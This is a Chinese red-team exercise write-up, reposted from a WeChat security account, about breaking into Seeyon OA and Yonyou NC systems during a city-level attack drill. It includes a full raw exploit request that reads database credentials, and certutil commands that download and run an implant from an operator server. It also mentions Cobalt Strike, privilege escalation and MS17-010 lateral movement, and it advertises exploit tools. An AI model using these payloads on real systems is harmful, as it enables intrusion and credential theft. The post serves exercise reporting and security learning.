简单的地级hvv总结

admin 2024年10月7日23:21:28评论19 views字数 3196阅读10分39秒阅读模式

现在只对常读和星标的公众号才展示大图推送,建议大家能把威零安全实验室设为星标”,否则可能就看不到了啦

简单的地级hvv总结

免责声明

本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。

由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。威零安全实验室公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

    记录一下此次hvv遇到的站以及问题,前期拿到目标之后,第一时间没有做一下明确的分工和战术合作,还有一些没有找到目标单位资产站点的,到目前为止都是我比较感到惋惜的,还有一些是打点速度慢,在实战中经验缺乏,导致能打进去的点第一时间没有打进去,打进去之后发现别人已经光顾了一波了,其实这些问题也不是说找不到,重点是你的方法存在一定的问题,希望在后续的过程中能摸索出一个好的作方案吧!

01
0x01 致远OA

这个致远OA我真的是看了好久,试了一些流行的poc和工具,可能拿站真的是需要运气,有的时候你需要多试试几个工具,否则你真的会与那个点失之交臂,最后只会留下无尽的悔恨。

在坐牢的时候看到一篇文章,致远A8+全版本存在数据库账号密码读取漏洞。

影响版本:致远A8+(V7.0SP1-SP3

于是进行测试一下,因为当时测试出它是有session泄露的问题的。通过session可以进后台,但是后续利用都被拦了,于是有了这次尝试。

简单的地级hvv总结

使用poc

poc:漏洞利用点为:/seeyon/officeservlet接口,当访问接口时 响应值为200且出现如下响应体时,基本可认定该漏洞存在

使用该poc进行验证,如图所示:

简单的地级hvv总结

然后使用exp进行攻击

POST http://xxxxx/seeyon/officeservlet HTTP/1.1Host: xxxxxPragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=x-forwarded-for: 127.0.0.1x-originating-ip: 127.0.0.1x-remote-ip: 127.0.0.1x-remote-addr: 127.0.0.1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 350DBSTEP V3.0     285             0               0              RECORDID=wLoiCREATEDATE=wLehP4whzUoiw=66originalFileId=wLoineedReadFile=yRWZdAS6originalCreateDate=wLehP4whzUoiw=66OPTION=LKDxOWOWLlxwVlOWTEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYliCOMMAND=BSTLOlMSOCQwOV66affairMemberId=wLoiaffairMemberName=wLoi

简单的地级hvv总结

      如图所示,成功获取到了数据库的账号密码,但是还需要对其进行解密,使用工具对密文进行解密即可得到结果,如图所示:

简单的地级hvv总结

      然后想进行数据库连接,结果该站点没有对外开启3306端口,于是只能在内网进行利用,后面也在内网证明到了这个账号密码是正确的。解密工具放在后台了,获取方式:后台回复【解密】获取

峰回路转

      拿到了数据库密码不能连,那真是恨得牙痒痒啊,没办法只能剑走偏锋重新信息搜集,然后在一个落灰的文件夹里面发现一个工具,其中一个poc刚才没有试过,这就是为什么要多用几个工具或者使用所以poc进行测试的原因,于是使用这个点直接梭哈,如图所示:

简单的地级hvv总结

PS:工具获取方式:后台回复【OA工具】进行获取。

终于进来了,我第一时间翻阅配置文件,找数据库相关信息,然后使用刚才获取到的账号密码进行验证,连接成功!这也验证了刚才获取到的数据是正确的。

简单的地级hvv总结

然后用fscan直接对内网进行扫描,没有发现更多有用的东西,cs上线一下提升到system权限,浏览文件发现一个比较有趣的东西,管理员在桌面留了2个txt,如图所示:

简单的地级hvv总结

哈哈哈哈哈,吓死了,嘶,赶紧跑了!(后面其实是没有什么了,不能横向,有别的队打进了的痕迹,于是赶紧写报告了)

02

0x02 某用友NC

     在对全市目标搜集的过程中发现了一个用友NC的nday,访问如下接口 /servlet/~ic/bsh.servlet.BshServlet 执行命令,如图:

简单的地级hvv总结

然后使用vps开启服务,进行远程下载并上传文件,再执行,中间碰了很多坑,恶心到我了,这里就不写了。

certutil.exe -urlcache -split -f http://0.0.0.0:8000/wechat.exe E:yonyouhomewechat.exe

简单的地级hvv总结

执行exec("cmd /c dir&wechat.exe"); 成功上线。

或者可以这样一条命令:

certutil.exe -urlcache -split -f http://0.0.0.0:8000/wechat.exe E:yonyouhomewechat.exe & E:yonyouhomewechat.exe

简单的地级hvv总结

简单的地级hvv总结

通过横向得到ms17-010漏洞,通过msf进行渗透攻击成功拿下另一台主机权限。
简单的地级hvv总结

然后在打完之后看了下该目标的其他站,发现了struts2漏洞,又得到了一个入口,要是早发现这个点也不用这样的麻烦了,如图:

简单的地级hvv总结

打了半天用友,没在第一时间发现这个struts2,真的是浪费了很多时间!

03
0x03 参考链接
https://mp.weixin.qq.com/s/nbnqAv6pKId1uzW3F2znJg
04
0x04 工具获取 

1、OA解密工具获取方式:后台回复【解密】

2、OA利用工具获取方式:后台回复【OA工具】

每日祝福

祝师傅们,天天高危、日日0day!!!!!!!!!!!!!!!

广告时刻

欢 迎 加 入 星 球 !

威零安全星球永久开放,内容包括:实战报告+hvv红蓝资料+代码审计+免杀+渗透学习资源+各种资料文档+直播课短期一年,后续将开发自己的红队工具库供大家使用。有需要的可以添加后台微信联系本人。

简单的地级hvv总结

或者翻到文章末尾添加机器人进群考察。

简单的地级hvv总结

星球的最近主题和星球内部工具一些展示

简单的地级hvv总结

简单的地级hvv总结

简单的地级hvv总结

简单的地级hvv总结

PY交易

为了方便师傅们交流学习,我特意创建了一个群聊。内部会分享一些脱敏的漏洞报告,渗透测试实战案例,更有若干大牛巨佬分享经验。后续还会提供一些福利包括送书,小礼物等等,欢迎各位师傅进群交流

由于“威零安全交流群”群聊人数已满200人,扫码进不了的师傅可以添加机器人secbot回复“威零科技”即可加入群聊

简单的地级hvv总结

简单的地级hvv总结

原文始发于微信公众号(威零安全实验室):简单的地级hvv总结

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日23:21:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   简单的地级hvv总结https://cn-sec.com/archives/1938835.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息